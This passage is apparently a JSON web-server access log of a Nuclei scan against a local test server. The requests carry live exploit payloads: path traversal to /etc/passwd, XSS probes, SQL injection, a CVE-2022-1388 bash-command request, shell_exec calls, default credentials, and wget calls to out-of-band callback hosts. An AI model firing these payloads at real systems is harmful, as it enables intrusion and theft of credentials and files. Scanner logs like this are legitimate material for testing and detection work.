HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpMyAdmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"wsecure_action=update&publish=\x22;} header(\x22Nuclei: CVE-2016-10960\x22); class WSecureConfig2 {var $test=\x22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/wsecure/wsecure-config.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"content1=&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /kindeditor/php/demo.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=wpo_wcpdf_options_page§ion=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lib///....//....//....//....//....//....//....//....//etc//passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /website/lang/en_US?r=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"{\x0D\x0A \x22command\x22: \x22run\x22,\x0D\x0A \x22utilCmdArgs\x22: \x22-c 'echo CVE-2022-1388 | rev'\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /mgmt/tm/util/bash HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bwget,http://ca28bc0smpvbbtig07h0mbu3eo4qbimim.oast.pro%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bwget,http://ca28bc0smpvbbtig07h03j5hkp4bw4kue.oast.pro%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/swagger-ui/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /anchor/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json///a.png?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.override.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/CI.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/ui/PWResetUserValidation HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"_authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cs/ContentServer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com/%2F.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"content1=&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /php/demo.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1_db.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=rsvp-admin-export HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"{\x0D\x0A \x22command\x22: \x22run\x22,\x0D\x0A \x22utilCmdArgs\x22: \x22-c 'echo CVE-2022-1388 | rev'\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"localhost","request":"POST /mgmt/tm/util/bash HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?location=search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/swagger-ui/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opcache-status/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json///a.js?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OpenAM-11.0.0/ui/PWResetUserValidation HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/main.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /en-US/account/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"user=root&password=calvin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /data/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /localhost.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apis/apps/v1/namespaces/default/deployments HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_fragment?_path=_controller=phpcredits&flag=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /administrator/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jsp/index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger-resources/restservices/v2/api-docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php-opcache-status/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /emergency.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json///a.html?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", 